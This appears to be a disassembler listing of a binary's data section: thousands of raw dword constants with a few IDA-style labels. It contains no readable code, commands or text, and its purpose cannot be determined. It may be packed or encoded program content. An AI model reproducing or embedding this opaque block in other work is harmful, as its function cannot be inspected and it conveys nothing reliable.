dd 4046880Bh, 0DB0FD8CDh, 1AD24CA1h, 40568AC9h, 0D9EBA01Dh
dd 0BBB64023h, 76FFDC4Ah, 7E10E1EEh, 2E3407B6h, 4F47868Dh
dd 8FB10C35h, 56011452h, 1AFF03DCh, 0E87A914h, 0F88B2ED1h
dd 0B41FFF85h, 0A973F355h, 18678308h, 1C47C700h, 750DE101h
dd 24060073h, 0E460D06h, 8FB28E8Dh, 89FBC74Fh, 258A2047h
dd 7686889Eh, 67F6B7F7h, 4438B1Ah, 41F1F89h, 47B8938h
dd 3618968Ah, 97B367DBh, 157505ACh, 760040D0h, 585EEC8Eh
dd 0B6FF4D47h, 7EB0BC4h, 1C365876h, 50A5361Bh, 803D0785h
dd 3C2F34E1h, 6951CD9Bh, 194F8B63h, 0C6018907h, 89DEC966h
dd 60735A48h, 7B645EC2h, 0ABC7C06Eh, 8B6C4B2h, 0DD3399B0h
dd 0D0BD02CDh, 579D835Ah, 1D8BB8B6h, 0AB84DF2h, 0C380112Bh
dd 5906FB2Ah, 1EC01B2Bh, 0DF0BB9D3h, 5D8D30D0h, 7C83CC8Eh
dd 0FD30824h, 12DFEE1h, 8B470C99h, 6B08A300h, 0B6C058A0h
dd 0CCC9C2B1h, 170DD796h, 0B89A4B60h, 0DB79BBBFh, 8B7FE00Eh
dd 3B80605Eh, 8B44750Eh, 538BF84Bh, 176D4DC2h, 0BF0B7F0h
dd 81FF330Ch, 45D9E0F9h, 0D2C410F4h, 74F8ED9Bh, 74E40D41h
dd 0FB5D8D39h, 0BB75FB52h, 51509A4Dh, 643E5077h, 0DBF5109h
dd 0EA97E04Bh, 0D2322FD2h, 89187E89h, 8B301C46h, 0C4C22576h
dd 0F044C78Bh, 0CD16F0D9h, 6030FF51h, 0CA74544Ch, 9F2D23EDh
dd 0F685F06Bh, 0C60CDB58h, 63DB6446h, 46DDFBBFh, 4B3B8968h
dd 3C850F04h, 0DF98315h, 1E33820Fh, 37DB37F4h, 0C255D81Ah
dd 10CA3B0Ch, 0F87D8122h, 7FC1EA16h, 0C709759Fh, 73C61846h
dd 5C23F666h, 1A8BE3D8h, 4E719F8Dh, 0C488D1Ch, 0DBE10605h
dd 408B20F6h, 2455CBD7h, 4AEC5D89h, 0BFB16F87h, 8D928F46h
dd 0F42BE487h, 78318906h, 89C2C8C6h, 0CB975670h, 5D8B13h
dd 0F585B42h, 0C6481D43h, 20CD2CBAh, 46B746CDh, 2B685777h
dd 0B910F9D5h, 85C1DBF7h, 35170B61h, 0C1DF431h, 0D0B2AACh
dd 0E4B5748Ah, 0A1286E3Bh, 89DB80B5h, 0F0459C41h, 70444449h
dd 89E08661h, 704EA6E6h, 0F1B27276h, 9BEC9706h, 609F2C56h
dd 73C5F588h, 437389CBh, 8762CDEEh, 572278C6h, 0BE086126h
dd 0DF169F08h, 0DB6205C5h, 0BB1424BDh, 778BC81Ch, 99CC3EDEh
dd 0F17DCD93h, 20C390Ch, 0E1D3B810h, 751CEBB3h, 30BE805h
dd 4AEB30A3h, 66CF6CE0h, 12DD56D8h, 0CCC9410Dh, 49204356h
dd 163C6BAFh, 41005225h, 0D52035Dh, 732F9A49h, 5F1B00h
dd 0C15B4E57h, 10240524h, 0A2DC08D1h, 7A50701Bh, 8A305E8Dh
dd 0A1456653h, 0AFC45BBh, 3BFA0500h, 0BB5D9F3h, 1C0972B9h
dd 0F20CF012h, 0F3E6CD0Eh, 0E87EF464h, 0EC1AEA18h, 5EC6FF8Eh
dd 84D7F88Bh, 0AB2175C0h, 82140C45h, 0E859270Fh, 35033207h
dd 3B236C23h, 8A564C36h, 0F6EA4841h, 0BB5B9103h, 0B02C211h
dd 880C063Fh, 0E7C8F3E4h, 140E1A10h, 0BC018D8h, 0F9F9E41Ch
dd 3E2079F9h, 137C2410h, 2C0CC828h, 0AE1C0D9Ah, 84766385h
dd 0CC3A5D02h, 0FD0A6685h, 2C144ADDh, 1BADEED6h, 38B1E64h
dd 68A17C20h, 4207890Eh, 0D8F9F4FEh, 4780804h, 6EB3D89h
dd 0B03E42C6h, 42A75B01h, 0C77F2E91h, 8E832F00h, 69C6B5Dh
dd 59344B18h, 0DED94222h, 1C2C0B6Bh, 9F186303h, 3A9BB438h
dd 8FDE02EBh, 9BE56B5h, 58878CF7h, 0A24CCEDFh, 0DBB60C5Ch
dd 0B893319Bh, 834B584Eh, 21610C7Dh, 0D2C190FFh, 753E7883h
dd 0EBCE2E9Dh, 1840C71Eh, 0A7B1157Eh, 20155603h, 0E0D22F35h
dd 592A5E78h, 10021840h, 7EF7CC78h, 1850AB52h, 6D60158Ah
dd 0F62EB2A0h, 72854A22h, 8C587356h, 74EB53C6h, 0EB36B2A2h
dd 1CC631ECh, 75DE56DDh, 6C06285Eh, 0AA37DEC8h, 5828340Ch
dd 23C36B72h, 57F85DE2h, 1183E04Eh, 8F68C0B5h, 79D2FC72h
dd 0E9FBC52Eh, 548FE4B7h, 6005EB7Bh, 568D72B8h, 740C5564h
dd 89BFDB7Fh, 0F0EB367Fh, 647E80h, 53684E37h, 8B60518Bh
dd 305A6A41h, 0CE91B52h, 8AFFB81h, 0A90DAE07h, 0CFA285C0h
dd 2C0375D8h, 0A5F4ADB2h, 0B8105866h, 8428B18h, 95C8070Bh
dd 5B734834h, 1830FCA9h, 29EB1EECh, 0CDD08A10h, 5C04617Dh
dd 0D402E0ABh, 774CFEBBh, 0F8190F09h, 533F5F2Ch, 0F2C41E3h
dd 85D8FC48h, 0FFFCAEDBh, 55F1D5DFh, 0FA811029h, 40010008h
dd 718D4775h, 247B8D0Eh, 8BA566A5h, 0AD5B1028h, 5C300715h
dd 90542B76h, 8369F3DEh, 3019C463h, 0EB1DAEDBh, 12201A0Ch
dd 0D6EDC1F6h, 409660Dh, 0A1140766h, 0DD0B2920h, 0EBED9E95h
dd 18094E36h, 66AB4DD6h, 352BDBABh, 3E2A07F3h, 0B1F42F6h
dd 3056CED8h, 0ED0C2714h, 7CDB1A93h, 140A1194h, 38BC5251h
dd 0DBC3DDDCh, 0AF930CE0h, 708D3D10h, 7029614h, 0D9D33308h
dd 0DE8D5967h, 212A1C87h, 555908Bh, 7B216FB2h, 50D77105h
dd 2022EB58h, 6D03FDBh, 8B921B0Fh, 21833052h, 164C50F1h
dd 694CB87Eh, 513C5037h, 25833C04h, 80F85223h, 183A0099h
dd 0ACAF4F23h, 8BD33CECh, 1DCF0BF1h, 0B905109Fh, 9688F93Bh
dd 60A5FCF0h, 0C732943Bh, 788D5280h, 0E7D3BC4h, 407CA25Fh
dd 8B409700h, 69FC3C47h, 708499E8h, 576CD308h, 35A1DA8h
dd 0E31CFEE7h, 7241D88Fh, 2A528AD7h, 3118EBD7h, 2461708Ch
dd 0C3D200Fh, 9DF2477h, 0F4BE0C2Fh, 3748A73Fh, 0F4BEEFE3h
dd 7D89CF4Ah, 3ADCB8F7h, 0B6B6FB5Bh, 0B40118F8h, 41F6FCE7h
dd 0BB9AD7E1h, 0A6B674FBh, 0EDB376F3h, 3A19481Bh, 447F839Ah
dd 61D051E2h, 0C1166336h, 311644D3h, 52D195B2h, 0F60D8BE5h
dd 0E3A2BA28h, 0A71E56D3h, 54AA6076h, 0A374E022h, 0F97FFF61h
dd 3A6253A9h, 8BC14D8Bh, 74D28511h, 8BC28B06h, 83F6EB10h
dd 0AE16C6E0h, 53B4F47Bh, 8EEB0AA8h, 2D58EE2Fh, 830CA64Bh
dd 82801A20h, 13297476h, 5114A0CFh, 9005EA84h, 425638C3h
dd 143F964Dh, 0F76BEFEFh, 8699FF0Bh, 0A06BAD0h, 7C506046h
dd 0BB07BC63h, 0A839868Ch, 0F4B3D3BAh, 0C10E334h, 0A2246467h
dd 21A7923Ch, 13F07723h, 5BF86C03h, 6A5C7BDCh, 5A03FF0Dh
dd 0A58B1975h, 7C112C4Bh, 44A750A1h, 19722D77h, 0B6FB5BE5h
dd 4B030667h, 591CEB2Ah, 8B0A7318h, 2376CF48h, 1477CEF8h
dd 0EB4F0573h, 8401D13h, 0B41AD02Dh, 0EB232C66h, 0EADC1BA9h
dd 8B2C0BD5h, 7B360214h, 6739C1F6h, 8FC16BBAh, 0DC108410h
dd 0DCD85F13h, 0A508B336h
dd 7F762018h, 0F8207D02h, 45F2D2Dh, 0F4658314h, 0FFFE6234h
dd 0DBBF0D76h, 4D688940h, 3DD95018h, 1C7D39C3h, 0E8609773h
dd 2BC7EB1Bh, 0A2B11C45h, 0FD3AB04Bh, 0FF404321h, 0DF7C3873h
dd 0EC9EC567h, 538A2446h, 0F8992740h, 0A0D7F80h, 0BA528B80h
dd 0C9F4752Bh, 4F7815B2h, 343BC24Ch, 360580ECh, 34264036h
dd 65D81D66h, 0B35E2475h, 0BA68EB5Eh, 46A16B41h, 37C98568h
dd 0D855C0C1h, 834FEE51h, 0A949F179h, 746152E1h, 54084925h
dd 6359B289h, 0E2E7C5CBh, 850B7814h, 14F80FDAh, 1A1C6080h
dd 55364C78h, 0E0A5F621h, 82A5F302h, 0A4F303E1h, 0D2701Dh
dd 8D0442F6h, 3D1A107Ch, 0FC07DB07h, 8318B334h, 0CE4D4860h
dd 1B694408h, 88251763h, 1055CF83h, 0BBB9258Bh, 838DF01Fh
dd 113C4A73h, 5404289h, 1B133ED4h, 0A00B3C69h, 872D08C1h
dd 93AFB630h, 0F424CE2Eh, 23AEF477h, 0C1C0999Ah, 8448D83h
dd 6085E4Ch, 26291F43h, 0D8367075h, 0E8F2D920h, 74ECE8EFh
dd 0E96C3E38h, 7E514848h, 0E6DF1CA2h, 5C73F46Eh, 342E5453h
dd 0DB482C44h, 44A95588h, 70BF208Eh, 3B156D27h, 0CD0B3F7h
dd 3A3C3971h, 375BA474h, 60DFA6CCh, 4049D341h, 3A46B2C3h
dd 358BC4D8h, 0C8AAD602h
dword_444804 dd 9EC34200h dword_444808 dd 0D308BAD7h dword_44480C dd 0D634068Ch dd 4A376B29h, 9C2C643Fh
db 0F0h
dword_444819 dd 0B805EB30h db 16h, 1Ch, 20h
dd 0E12CD023h
db 1Ch, 9
dword_444826 dd 8716C84h dw 3483h
dd 88940415h, 9C0CCF23h, 0F6CA5726h, 902342Ch, 3F0C3157h
dd 5AC1C153h, 0EB1B75E9h, 0EC35DB14h, 0ACD98BC0h, 2B2075BEh
dd 93A572DAh, 0D8835713h, 12F8FBA4h, 2C1054DAh, 22B7452h
dd 0B4D9F161h, 75B02DCDh, 596CB23Ch, 303C6DB6h, 24282C02h
dd 87B06EEDh, 2C107485h, 622D2CE6h, 1A05AADCh, 3AD08351h
dd 99D6F82h, 0AC28BFFDh, 24FB70Fh, 469AF528h, 3DD728FAh
dd 4B63610Eh, 0BBF65BC6h, 28399D21h, 0B7095AA0h, 34080E15h
dd 0E6631181h, 1F1DE5D6h, 0CA830A02h, 8B9EEBB5h, 60168AB5h
dd 0E6201559h, 1CCC4388h, 803BE001h, 89C06F6Dh, 59890B71h
dd 78C91804h, 4F61D813h, 22C857CAh, 1548701Bh, 1372078Bh
dd 36D8C45Ch, 3B04B94h, 0DB6CB22Fh, 42A72D1Bh, 20056A18h
dd 0ADC47E5Ah, 34883BEDh, 3B81048Bh
dword_444914 dd 0B35C7EC2h dword_444918 dd 578DF423h dd 740368EEh, 0E9BE530Bh, 1BE75681h, 39E4403Ch, 0E88FFD15h
dd 250F8503h, 8E22378Bh, 77A13D6Ah, 59A25861h, 8B01A000h
dd 0ECA8D4B3h, 8BEF8DDDh, 0EBDC8905h, 6043240Fh, 0D0211C6Ah
dd 0DAB01B7Eh, 313990BEh, 3766CEBFh, 758A156Ah, 0B9EC6316h
dd 1DF0333Bh, 36EC6E23h, 4D738B71h, 9641835h, 7B574D77h
dd 0B65968DEh, 4C300558h, 1830B454h, 0CB2E461Bh, 480C18D6h
dd 50AE545Ch, 5979EC19h, 1A125C34h, 0FE1DB754h, 0E80DBBAFh
dd 59D8C90h, 44538904h, 1C4800C7h, 1A7D2BA3h, 0C63B0129h
dd 0DB0293BEh, 7018EA44h, 67B43C7h, 0B7631E53h, 8EBA2210h
dd 0F5C03EA4h, 0C6063B96h, 0C34214Ch, 0A0E51284h, 146130B9h
dd 3548845Dh, 26D721BBh, 0E80E2A35h, 58C90729h, 0A6B259F7h
dd 6B570A78h, 8A846891h, 7B1875B5h, 0DE006E0Fh, 6FD40A29h
dd 8D1B6A1Ah, 759107Ah, 58E02C9Fh, 0F3E14D18h, 1D7C06BFh
dd 5109C92Eh, 50984E10h, 1A3700A0h, 3243B799h, 326B8632h
dd 0CE0CFC46h, 8CA64D4Dh, 5BA36039h, 320AB466h, 0D70D6DB6h
dd 31AA640Ah, 597A084Ah, 0DED8FB77h, 0CA664AD1h, 4B14AAE0h
dd 0C0857132h, 68118142h, 0A8939C0Ch, 5C47AB5Fh, 0B98F0C60h
dd 0CB428E14h, 84F2D3h, 3B193153h, 0BB800E84h, 278A605Ch
dd 0A46ECCECh, 8066E290h, 0A4E5C8Dh, 6E414567h, 8897C4h
dd 300C88FAh, 0EC819125h, 0C41D1038h, 5725CC2Bh, 6807BF12h
dd 4B9AECDh, 0C3BAFF33h, 9680D9E6h, 4DCDAD8h, 3E6C9EFCh
dd 0CC8123Bh, 10CC0ECAh, 910B18D0h, 1AD27CD9h, 66F820D4h
dd 6DD02894h, 0E213E003h, 0D40FD22Ch, 531740D5h, 83056A2h
dd 28656DA0h, 5D8D57C2h, 365B6199h, 0A1ED6A7h, 580C81C8h
dd 11CB21B7h, 0C83BD0h, 6C8B7D05h, 0D83B180Fh, 8C3DB611h
dd 0EE228478h, 0BA1F6F3Fh, 4B809ECh, 0C8DF820h, 19E7C17Fh
dd 0EEC42DB4h, 0D521C448h, 0F4DC0744h, 0EFACE877h, 0BF773A56h
dd 45818953h, 6DC608Dh, 0E0B541D1h, 0DE8C00F6h, 5B17A096h
dd 318BE04Dh, 81C1287Dh, 0AC99A045h, 0BBB9A2AFh, 0B60DFFF4h
dd 0C2FF50BAh, 0B873738Dh, 9A2E8932h, 8DDF006Ah, 0E5B5F87Ah
dd 0F86675B6h, 408830Dh, 0FB02EC03h, 0F4D68E96h, 14279D06h
dd 0B41BE901h, 176E6DF0h, 377B85B2h, 14F05Eh, 1E19B946h
dd 0EE150CFFh, 93A00CFEh, 89CABBA0h, 51E35F38h, 0D41C31C6h
dd 6AE2797Bh, 718B8C6Ch, 0E00F4D73h, 0D3591B0Fh, 0A239A32Ch
dd 0C321C363h, 0C1A1EFBh, 2B5AD113h, 140D7128h, 7341828Ch
dd 43836426h, 17750EBAh, 8A80EE0h, 38359783h, 4C0D5B9Ch
dd 0D2F89390h, 28481A9Bh, 1147B81h, 775FCC4h, 0D834ACB8h
dd 37EB2AA6h, 45B95746h, 3C5278A4h, 4C05309h, 5A01BD53h
dd 2F874073h, 0F14CD968h, 0BDFDC468h, 1D6A5F9Bh, 4C8BBF3Bh
dd 93A354BEh, 6147981h, 0AE00A17Fh, 208D6D01h, 5DC3881h
dd 54D00576h, 1B1B68h, 725E2C06h, 0A39DDD3Ch, 665D142Fh
dd 11283029h, 9B584A19h, 2106EA9Ch, 611BA58h, 18715164h
dd 700E0EE8h, 117F6749h, 9B7F0802h, 7EE08558h, 4A742705h
dd 52211D28h, 8D4D10B9h, 7D49C87Ah, 8C0C7668h, 57841446h
dd 0AB7EA439h, 895F182Bh, 1E8B1046h, 0FC0E07Ch, 0C3815615h
dd 5E551DFAh, 21FF87B9h, 0C3835607h, 0B8ECEB60h, 95ED519Ah
dd 0D64B1819h, 74825373h, 0DACCD57Eh, 77E43457h, 830B89A5h
dd 4376320Eh, 478D47AAh, 36FF477Fh, 0CC0BEC90h, 1840F180h
dd 83814789h, 9E970787h, 579E7C57h, 5A2DBD60h, 3E8750ACh
dd 57D68B4h, 3CA39098h, 0E0663C6Bh, 83F06E81h, 79FF04C6h
dd 0C499375h, 3218BE45h, 0F658102Dh, 2CD8901Eh, 50BE9C71h
dd 480D8B46h, 0FFBFEED0h, 8A147D0Dh, 3B09B8D0h, 541588C8h
dd 6557407h, 3E1A2DFFh, 8BC459EFh, 75DF3B09h, 4D1314F3h
dd 79D61B94h, 976F9B53h, 0F98C359Eh, 47754C56h, 3844F01Eh
dd 584B5410h, 184503E1h, 0C4DE1A57h, 0D7CA06C3h, 340125FDh
dd 10F75025h, 161CEB97h, 8C102E18h, 928733D5h, 18D12644h
dd 83553AB6h, 0F8400814h, 2F05A142h, 0EAB1CAA9h, 0AB70BFD0h
dd 7C75899Ch, 4E8DF250h, 0EE55890Eh, 0ED1B7558h, 5A3D35E6h
dd 9505B80Ah, 8083B082h, 518C49BAh, 0C107B99Ch, 0F558101h
dd 9B059786h, 8F0483A0h, 748EEA4Eh, 7EC0E52Ah, 80350F60h
dd 61F1A74h, 0A3162ACAh, 8953270Ah, 54F7C02Ah, 77C92826h
dd 4A7461E1h, 74F4469Eh, 0A9649D12h, 47388C58h, 0B7E0F458h
dd 30F40064h, 98430C4Fh, 278DCA55h, 1F7827D0h, 0A23DD7BAh
dd 104CA1BCh, 422A7A03h, 0E045C7A9h, 8A84081h, 5414B0DDh
dd 8E76E58Ah, 3772D6DFh, 0D3FF2DA3h, 0E6A1FB9h, 3447B42Eh
dd 0D60A238Fh, 56C51E41h, 5921ADA2h, 36108731h, 6EB78057h
dd 0F04BD1Ch, 37445015h, 517F3AD7h, 0B0FA0C09h, 99A266D0h
dd 4C53048Ah, 37BE87D5h, 6FC25A90h, 0B2FFD3A4h, 0C10D10C7h
dd 1FEB343Ah, 0D9515252h, 7D6A78C1h, 56D95138h, 0EC90830h
dd 5653BF03h, 251FA534h, 0B000E002h, 1C27E78Ch, 0E53AA1D4h
dd 2D6DBF80h, 0B31EA3Ch, 0DC68870Fh, 880C60F3h, 4D94771h
dd 5A10395Fh, 0AE1A4D98h, 23FCD008h, 0C86D781h, 0F011FC59h
dd 0C9C8726h, 0FCF8E442h, 812B3BFCh, 8F5D3A2Dh, 1EE155D2h
dd 4B0C00C6h, 0CC9D82Ch, 80C81C8h, 9193DD08h, 0F1463E5h
dd 0E408F808h, 0F8F25388h, 8DF84E8Bh, 1D6803B3h, 55DB93E2h
dd 0A6838808h, 9A5E599Bh, 42D42A0Fh, 84A8908h, 0AF1C019Eh
dd 65147111h, 6F19B82Bh, 7F45E992h, 20D5C70Ch, 4CC803D6h
dd 0F2D2C245h, 0BAF3E010h, 770C7E38h, 2103941Eh, 1131089Fh
dd 212162CBh, 56D48A17h, 97EBE21h, 347C5039h, 0C2D8F3C9h
dd 4DA2D73h, 0BEC0177Fh, 449C481Eh, 0D74CEE1h, 7B7091D9h
dd 0C2E36F89h, 67B89374h, 740C203Bh, 360F3508h, 8FECAB77h
dd 9658D8EBh, 99219F0Ah, 431F07B2h, 0E411241h, 0F5C2581h
dd 0F46D93FEh, 3775981h, 0D7586043h, 3490C197h, 4476CCC3h
dd 21D9B0AFh, 98AF6D3Bh, 401AA3ECh, 95C009Ah, 683DEC75h
dd 5D4E1584h, 1C90EDB7h, 0A264A16h, 69362E3Bh, 9B08B19Ah
dd 0F30CDEF2h, 1C90C6Dh, 581B0D29h, 933491A7h, 3DDBEFDBh
dd 44C29847h, 8DF586E9h, 0CF0E4430h, 2A2D1669h, 14E30C99h
dd 0DDC07553h, 140773B8h, 727E8060h, 0D21A4E75h, 8756E82Eh
dd 95D23339h, 0C793074h, 48C4B1CAh, 4DB94DC0h, 7AB7F76Fh
dd 0EC588B16h, 0E3811058h, 8C4C0FFFh, 7508060Bh, 0C9B1B6Fh
dd 47D1037Eh, 6B1ED24Ah, 7EE82DF5h, 1689B914h, 5A9246C6h
dd 3B78FDB8h, 0EB145405h, 48C8DE03h, 5C197649h, 925A7523h
dd 3A105801h, 6FB76B2Ah, 4FFC8C36h, 6683EA75h, 86668079h
dd 5024B619h, 17C2521Bh, 0C4B6183Ch, 56BA0217h, 71105D39h
dd 9F2BCB18h, 3E34C17Dh, 8B08CE08h, 9CDF4571h, 75615D75h
dd 14D214D3h, 1C593858h, 0BB5B5075h, 1D41C16Dh, 4CEF85Dh
dd 976FDF08h, 50F3CE6Ah, 55014814h, 0D2D33BF8h, 4E476B5Ah
dd 9418EBC8h, 230CEA13h, 0EFA5A6D4h, 0B3FFFAB6h, 39D3CAEBh
dd 0FA8F1421h, 56F61FDh, 0D641C604h, 646F616h, 0EB0CDC05h
dd 878AE75Bh, 0E48EF84Ah, 0E5C06056h, 0A86C5AE6h, 0AAADE114h
dd 0B2AF0089h, 2D6B77DDh, 0F33B368Bh, 3C7C74A5h, 77EDCFEBh
dd 743E754Bh, 1472553Dh, 0C28B0277h, 0B76E0629h, 0D02BDF0Bh
dd 0EB970413h, 0A0744DA4h
dd 2B76101Bh, 0EFD68617h, 0D2F3DB04h, 68DB6B3Dh, 0D4D9AD03h
dd 29CB270Ch, 0AB9AB412h, 2CC22A18h, 0DABB4820h, 11011586h
dd 4B4E8637h, 0AAC243B5h, 658714CAh, 0AB1F6F46h, 66A57BDh
dd 0FE8B1459h, 0E340B856h, 2991B410h, 6ACC2D0Dh, 0C4A3EECDh
dd 6614A06Dh, 0B302B615h, 41E08812h, 0D7506202h, 9C533C50h
dd 0CC0CEE02h, 8D1EFE6Fh, 0D066087Eh, 5459C01Fh, 8AE8EB46h
dd 0DB806956h, 2ECE0F7Ah, 0BD3114E5h, 1DD6CCE7h, 20F45406h
dd 2DD81E68h, 9DB0CF64h, 101D61h, 36A91A65h, 0EE5A5540h
dd 2D54B4BDh, 34FD6F46h, 0A02CB7FEh, 9FF98C8Ch, 0D6ED6FF3h
dd 0D19AB854h, 75273FF9h, 8EC03EDAh, 3C5F8207h, 0B8539351h
dd 170E42D4h, 575BAB37h, 1B6ABABCh, 0B249BE72h, 0F736DF87h
dd 190B6803h, 0B1FC0F9h, 473C8C02h, 0D2C446h, 18888EC8h
dd 85CC8CFCh, 8DED02CBh, 0B3F803C6h, 24C19C36h, 1B456C1Ah
dd 81BD6306h, 0D19A3F17h, 4D770127h, 8B42987Eh, 40B06F90h
dd 0C33FBBDh, 0F714C183h, 0F1B6CDE9h, 458853A8h, 14756E0Fh
dd 0B3844733h, 8A74477Dh, 0A4170F4Dh, 31F62032h, 0AE622570h
dd 0BED052B1h, 6D80B806h, 8109B364h, 701F29A3h, 82FB1DB2h
dd 49E80C79h, 0BE43D1CEh, 53524194h, 746A705Bh, 0B9E0A455h
dd 147E08B1h, 5BBAF89Eh, 201CD06Dh, 0F61122C4h, 76206023h
dd 0C7E0E82Bh, 180305D8h, 89EF1780h, 2F6CE51Eh, 9076C0F0h
dd 71FB3B8Eh, 47B7D1B7h, 7BE39A02h, 8B2B548Fh, 0CCFD5A9Fh
dd 87880C97h, 3B0B0208h, 1EF012D8h, 0EA222335h, 0D4284619h
dd 0F54BEC64h, 4C22F31Ah, 1F802142h, 5B332053h, 83011173h
dd 9C088596h, 6815881h, 0D1D0431Ch, 99B36216h, 0BD1E4B4Dh
dd 464646D4h, 94D8FC46h, 0F6161FDCh, 0CBB30D46h, 0BD8D69A5h
dd 8BBF61EFh, 0C54D89C7h, 0BBBF188Bh, 5781A305h, 65CC7EA2h
dd 11A508ECh, 893DCA94h, 6F263E37h, 496C1B9Dh, 2EC0F1Ah
dd 6831FFB6h, 1135B3ABh, 0F0415006h, 6C5EF7FFh, 278303FBh
dd 59F093A2h, 403FBFA5h, 0ABB73988h, 0FFFE1A53h, 0B30833FFh
dd 9F4A8A21h, 850A9024h, 4657E943h, 54212DC6h, 1F99EBB0h
dd 0E016D17h, 3F88B297h, 3A31756Dh, 8A48051Eh, 6CC68989h
dd 0F5484851h, 92FFED8Bh, 246E279h, 306B38BFh, 6BD78A30h
dd 63435EEh, 8A810C05h, 0AD93976h, 0F3BB3CCFh, 1C231C03h
dd 565ADEE1h, 0AC6A05FEh, 3B7593A3h, 3140A193h, 4513291Bh
dd 0A308200Bh, 0AD46CE14h, 4BC38BFBh, 0A692C123h, 3670143Ch
dd 0C3946CA1h, 0B66C2EFBh, 728AE742h, 43D8AA1h, 0C4CD86DAh
dd 8AD04BF6h, 6054F28Bh, 5CE13300h, 6FC34A65h, 494C3580h
dd 884D3890h, 0DE27B0D9h, 234E06C7h, 60F73F30h, 52810106h
dd 363C05F5h, 0C7201118h, 40C36245h, 8880C032h, 0A21A4CF4h
dd 47C7B0EBh, 6591598Ch, 4D6C1283h, 0F6D8721Ch, 740F0A02h
dd 0B3C2123Ch, 106B57DAh, 3CCD960Eh, 4F8083E0h, 0E85D807h
dd 830B4D1Eh, 540B947Bh, 547C0F08h, 931EE88Fh, 0BBBE2DE7h
dd 7502521Bh, 74100535h, 1247F619h, 0BD0B83h, 6A10759Eh
dd 30087B5Ch, 0BBB86AC5h, 8FA7F366h, 9A570A75h, 63145A53h
dd 228C001h, 58523257h, 0D12961B2h, 0D37B2CD0h, 1D0C639h
dd 868B7174h, 0EC6419CCh, 534F274Bh, 0CBCD9E8Dh, 19219086h
dd 86868E19h, 0E464EEFh, 545BCB96h, 57137501h, 0AC5D25B1h
dd 4ACB656h, 28E6E7ABh, 57B0154h, 919102CCh, 0C4C89191h
dd 9191BCDCh, 0B4B89191h, 9981D0C0h, 0D8D49191h, 452800E0h
dd 0FFC8C9h, 0E886EDE2h, 0BAE9049Eh, 5686F000h, 70BFC223h
dd 1FB3621h, 0E5A4DBAh, 33C708Bh, 8DB454C6h, 641BC1Ch
dd 0D16F0010h, 386ED7C2h, 635EE0EBh, 0DD221A01h, 1426FCBAh
dd 7C0B1790h, 7A4A76F1h, 7F071D7Dh, 7FFADEE8h, 188AC203h
dd 1E3ACB8Ah, 0C9841A75h, 1588A30h, 0BB715E0Ch, 905D5015h
dd 75114646h, 5A3FFE2h, 1B05CF76h, 1B4FD840h, 2204583h
dd 42A68183h, 723CC78Bh, 0C5FC3B96h, 727AB357h, 0EE4A33BCh
dd 0F06A2D20h, 0F0CAD8Fh, 0F22B00B7h, 0D4455D8Dh, 30B5B882h
dd 4EDF8106h, 0FA2BDAAAh, 64410C53h, 317061h, 0F452B5C8h
dd 0F040313h, 0A5FB0ED6h, 636F743Bh, 44176C6Fh, 53301912h
dd 671752F4h, 6778F142h, 0D55677C1h, 0BC4B4D94h, 0BEC6480Eh
dd 0A940912Bh, 2811D0Ch, 0F4E4562Ah, 0BED55787h, 387870B0h
dd 0F2032016h, 0B157AECh, 244E752Dh, 74032C8Bh, 0A3A05DFAh
dd 0EC5DB0DFh, 53C3200Fh, 0F4FFF3Fh, 62160122h, 510F486Bh
dd 0D4507620h, 9E56C14Bh, 3468839Eh, 0A96A382Dh, 1A57DA3Eh
dd 481CA331h, 5D12B0F3h, 48169420h, 1C85CF20h, 8760C214h
dd 1872177Ch, 0A37862ECh, 50CEB347h, 895B923Eh, 2B66B588h
dd 2271055Eh, 210E2301h, 5FFB67DEh, 1807F174h, 0BB2FA1E9h
dd 0C76F1463h, 24053F95h, 0F7505C3Dh, 4400D15Bh, 69007645h
dd 5C076300h, 6DDDC289h, 730B6487h, 0AE077200h, 1B9B75D7h
dd 6D030B61h, 7203741Dh, 3C5D631Bh, 558CDF20h, 0C117633Bh
dd 651F748Dh, 179B216Eh, 506DCF7Dh, 752ED49h, 426F6300h
dd 37CC0DB6h, 275C0D69h, 119440B3h, 18866CA9h, 0D0BDB432h
dd 0A8685CF0h, 5E50092Eh, 186809E2h, 53B281DAh, 6D4F721h
dd 4B501256h, 5A28261Ch, 8E25A86h, 0ADDA9583h, 0D85B7F6h
dd 0C4AA5807h, 53944D22h, 3BFC6851h, 76D6EE6Fh, 88982094h
dd 60DC89Ch, 6206FEB0h, 0B43EE6E4h, 0B8142F14h, 2DB6C0E0h
dd 288FF6DBh, 0D4D002CCh, 0C7E2057h, 0E83EE688h, 402F0C68h
dd 1B2F7379h, 241816C4h, 38568B1Eh, 1501DE6Ah, 0FA8B1BE2h
dd 0B859A146h, 0DE0071Ah, 0F716D16Fh, 920920B8h, 289345Eh
dd 5E8BF570h, 868940F2h, 5478464Bh, 22C11563h, 0FFB894FAh
dd 7447EECEh, 0A3045868h, 0D6FF0E6Ch, 0C88648B8h, 50157CF3h
dd 1CEA484Ch, 53C1D0F4h, 0F329CC6Ah, 736F4DECh, 5951833Dh
dd 402FF396h, 0F1F06834h, 0C4F07651h, 12F0980Ah, 140D0FA0h
dd 7A32D453h, 0D84A06D9h, 1330CC12h, 65E53330h, 0E0C3031Dh
dd 34564430h, 0C9A0302Ah, 0FD2B02B4h, 0C81F5064h, 0D3654B01h
dd 6E697053h, 0ADEA0C4Ch, 21177451h, 0FEFB4901h, 53FEDDAEh
dd 6F626D79h, 1A4C631Ch, 52039417h, 75516C74h, 0B6B36A89h
dd 749790Dh, 92550861h, 1B3173EDh, 77A89543h, 5C642BB6h
dd 0AD542B56h, 4964506Dh, 6B29162Dh, 9566FEAAh, 6D6F4366h
dd 64656C70h, 92DB3E71h, 0F7F3951Bh, 0C0634200h, 4A68A0C6h
dd 0B517FA5Ah, 49F24DF6h, 455D376Eh, 0A1257E3Ch, 0D75E85FAh
dd 95735002h, 0B3B09F6Bh, 5422BD27h, 1B6E416Fh, 65176B8Dh
dd 4DEA330Eh, 0C7BFF264h, 24E7EB6h, 0EC4D6D4Dh, 61506B4Ch
dd 2BAD767h, 0E07B9AA8h, 1E66624Fh, 5E7E0366h, 0D44DB358h
dd 1452B517h, 0DAA17942h, 4541AACEh, 55EE7801h, 17D9F6C3h
dd 13707954h, 955369F9h, 5186DFFh, 6B736F1Ah, 2E6C6E72h
dd 0E12E7865h, 4BB536D6h, 61384B66h, 364F8273h, 13EFC973h
dd 75716341h, 8507269h, 0DB42ED77h, 724973DEh, 0D48AD71h
dd 3369613Eh, 7B70B6BBh, 7044D40Dh, 175D65A3h, 8B14C41h
